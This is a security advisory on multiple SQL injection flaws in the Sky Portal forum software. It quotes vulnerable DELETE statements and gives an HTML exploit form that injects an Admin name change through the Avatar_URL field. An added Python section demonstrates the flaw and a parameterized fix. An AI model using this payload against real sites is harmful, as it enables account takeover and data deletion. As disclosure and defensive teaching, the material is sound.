########################## WwW.BugReport.ir ###########################################
#
# BugReport Security Research & Penetration Testing Group
#
# Title: [Sky Portal] Multiple SQL Injection Vulnerabilities
# Vendor: http://skyportal.net
# Exploitation: Remote with browser
# Fix Available: Patched In Last Version In Vendor
#######################################################################################
# Leaders : Shahin Ramezany & Sorush Dalili
# Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact : [email protected]
######################## Bug Description ###########################
Description:
--------------------
Many SQL injection flaws were found, and we exploit one of them.
A registered user can change his/her name and read all other users' private messages.
Vulnerabilities:
--------------------
+--> Multiple SQL Injection Vulnerabilities
nc_top.asp Line 59
strDBNTFUserName = An injection can be made into the function on line 60, i.e. isMbr() >>> test.htm, but !??! this function is very crazy!
--------------------------
user can delete all bookmarks
inc_bookmarks.asp line 179
delSQL = "DELETE FROM "& strTablePrefix & "BOOKMARKS WHERE BOOKMARK_ID = " & delBkmk(ib)
This file is used by cp_main.asp
---------------------------
inc_profile_functions.asp
line 568,570,572,573
---------------------------
user can delete all subscriptions
inc_SUBSCRIPTIONS.asp line 163
delSQL = "DELETE FROM "& strTablePrefix & "SUBSCRIPTIONS WHERE SUBSCRIPTION_ID = " & delBkmk(ib)
executeThis(delSQL)
This file is used by cp_main.asp
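Added example (not part of the original advisory and not Sky Portal code): the concatenated DELETE pattern quoted above, next to a parameterized form, run against an in-memory SQLite table. The "PORTAL_" table prefix, the M_ID owner column, the function names and the sample rows are assumptions made for illustration.

```python
import re
import sqlite3

TABLE = "PORTAL_BOOKMARKS"          # assumed strTablePrefix value "PORTAL_"
ID_RE = re.compile(r"[0-9]{1,9}")   # what a BOOKMARK_ID form value may look like

def make_db():
    """Constructed sample data: two members (10 and 20), two bookmarks each."""
    db = sqlite3.connect(":memory:")
    # M_ID as the owner column is hypothetical; the advisory does not show the schema.
    db.execute(f"CREATE TABLE {TABLE} (BOOKMARK_ID INTEGER PRIMARY KEY, M_ID INTEGER, URL TEXT)")
    db.executemany(f"INSERT INTO {TABLE} VALUES (?, ?, ?)",
                   [(1, 10, "a"), (2, 10, "b"), (3, 20, "c"), (4, 20, "d")])
    return db

def count(db):
    return db.execute(f"SELECT COUNT(*) FROM {TABLE}").fetchone()[0]

def delete_concatenated(db, raw_ids):
    """Same shape as delSQL in the advisory: the form value becomes SQL text."""
    for raw in raw_ids:
        db.execute(f"DELETE FROM {TABLE} WHERE BOOKMARK_ID = " + raw)

def delete_hardened(db, member_id, raw_ids):
    """Validate every id first, then bind values and scope the delete to the owner."""
    ids = []
    for raw in raw_ids:
        if not ID_RE.fullmatch(raw):
            raise ValueError(f"rejected bookmark id {raw!r}")
        ids.append(int(raw))
    deleted = 0
    for bookmark_id in ids:
        cur = db.execute(f"DELETE FROM {TABLE} WHERE BOOKMARK_ID = ? AND M_ID = ?",
                         (bookmark_id, member_id))
        deleted += cur.rowcount
    return deleted

if __name__ == "__main__":
    db = make_db()
    delete_concatenated(db, ["1 OR 1=1"])   # constructed non-numeric form value
    print("rows left after concatenated delete:", count(db))
    db = make_db()
    print("rows deleted by hardened delete:", delete_hardened(db, 10, ["1", "3"]))
```

The same two controls, a strict numeric check on the id and bound parameters instead of string concatenation, apply to the SUBSCRIPTIONS delete, which has the identical shape.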
-------------------------- Html Exploit ------------------------------
<form action="http://[VICTIM URL]/cp_main.asp?mode=EditIt&cmd=9" method="post">
Photo_URL: <input type="text" name="Photo_URL" value="" size="200"/>
<br />
Avatar_URL[injection goes here]: <input type="text" name="Avatar_URL" value="',M_Name='Admin',M_Username='Admin" />
<br />
LINK1[Also injection goes here]: <input type="text" name="LINK1" value="" />
<br />
LINK2[Also injection goes here]: <input type="text" name="LINK2" value="" />
<br />
Password: <input type="text" name="Password-d" value="YOU MUST ENTER YOUR HASHED PASSWORD HERE (For Ex: 123123 = defbfbd84d16387273dde914fd309c3b)" />
<br />
Email: <input type="text" name="Email" value="[email protected]" />
<br />
Name: <input type="text" name="Name" value="Your Current Username" />
<br />
RECMAIL: <input type="text" name="RECMAIL" value="0" />
<br />
HideMail: <input type="text" name="HideMail" value="1" />
<br />
<br />
<input type="submit" />
</form>
Credit:
--------------------
BugReport Security Research & Penetration Testing Group
WwW.BugReport.ir
# milw0rm.com [2007-11-20]